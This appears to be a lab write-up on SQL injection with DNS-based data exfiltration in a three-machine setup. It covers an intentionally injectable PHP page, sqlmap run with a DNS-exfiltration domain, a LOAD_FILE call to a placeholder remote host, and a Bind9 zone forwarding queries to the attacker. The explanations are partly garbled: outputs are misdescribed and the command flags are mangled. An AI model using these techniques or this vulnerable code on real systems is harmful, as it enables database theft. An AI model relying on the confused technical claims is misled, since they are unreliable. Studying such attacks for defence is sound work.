SQL Injection Breakthrough: Delayed DNS Resolution
Simulating a Local Environment
In this article, we will delve into the world of SQL injection and explore a breakthrough technique that leverages delayed DNS resolution. This technique is particularly useful in a local simulation environment, where we can test and analyze the effectiveness of various attack vectors.
MySQL Configuration
To begin, let’s take a look at the MySQL configuration variables related to name resolution and networking:
MySQL> show variables like '%skip%';
+-----------------------+--------+
| Variable_name | Value |
+-----------------------+--------+
| Skip_external_locking | ON |
| Skip_name_resolve | OFF |
| Skip_networking | OFF |
| Skip_show_database | OFF |
| Slave_skip_errors | OFF |
| Sql_slave_skip_counter | 0 |
+-----------------------+--------+
6 rows in set
As we can see, the skip_name_resolve variable is set to OFF, which means that MySQL will attempt to resolve domain names.
Testing DNS Injection
Next, let’s test the DNS injection technique by attempting to load a file from a remote server using the LOAD_FILE() function:
MySQL> select load_file('////fdsafdsfdssx.xxxx.com//1.txt');
+-----------------------------------------------+
| Load_file('////fdsafdsfdssx.xxxx.com//1.txt') |
+-----------------------------------------------+
| NULL |
+-----------------------------------------------+
1 row in set
However, when we attempt to load the file using a URL with a domain name, MySQL returns NULL:
MySQL> select'////Fdsafdsfdssx.xxxx.com//1.txt';
+-------------------------------+
| //Fdsafdsfdssx.xxxx.com/1.txt |
+-------------------------------+
| //Fdsafdsfdssx.xxxx.com/1.txt |
+-------------------------------+
1 row in set
This is because the domain name is not resolved, and the URL is not recognized.
Simulation Environment
To simulate a real-world scenario, we will set up a local environment with three machines:
A: Win8 machine with a web server and SQL injection point
B: Ubuntu 14 machine with a SQLmap instance
C: Ubuntu machine with a Bind9 service
Win8 Machine (A)
On the Win8 machine, we will set up a web server with a SQL injection point using PHP:
<?php
$con = MySQL_connect("localhost", "root", "root") or die();
MySQL_select_db("burp");
$id = $_GET['id'];
$sql = "select host from burp where id = $id";
echo $sql;
$res = MySQL_query($sql);
while ($rows = MySQL_fetch_array($res, MySQL_ASSOC)) {
echo $rows['host'];
}
?>
Ubuntu 14 Machine (B)
On the Ubuntu 14 machine, we will set up a SQLmap instance with the following parameters:
sqlmap -u "http://192.168.199.210/sqli.php?id=5000" -tech "B" -dns-domain "whoami.com" -dbs
Ubuntu Machine (C)
On the Ubuntu machine, we will set up a Bind9 service with the following configuration:
zone "attaker.com" {
type master;
file "/etc/bind/zones/attaker.com.db";
};
zone "whoami.com" {
type forward;
forwarders {
192.168.199.144;
};
};
zone "199.168.192.in-addr.arpa" {
type master;
file "/etc/bind/zones/rev.199.168.192.in-addr.arpa";
};
Key Point
The key point in this configuration is that the whoami.com zone is set to forward queries to the B machine, which is running the SQLmap instance.
Testing the Attack
To test the attack, we will start the Bind9 service on the Ubuntu machine and point the DNS resolver on the Win8 machine to the IP address of the Ubuntu machine. Then, we will run the SQLmap instance on the Ubuntu 14 machine using the following command:
sqlmap -u "http://192.168.199.210/sqli.php?id=5000" -tech "B" -dns-domain "whoami.com" -dbs
tcpdump Output
As the SQLmap instance runs, we can capture the DNS traffic using tcpdump on the Ubuntu machine:
tcpdump -i eth0 -nt -s 500 port domain | grep whoami
This will show us the DNS requests being sent by the SQLmap instance to the Bind9 service.
Conclusion
In this article, we have demonstrated a breakthrough technique for delayed DNS resolution in SQL injection attacks. By leveraging the Bind9 service and the SQLmap instance, we can simulate a real-world scenario and test the effectiveness of various attack vectors. This technique has significant implications for web application security and should be taken into consideration by developers and security professionals alike.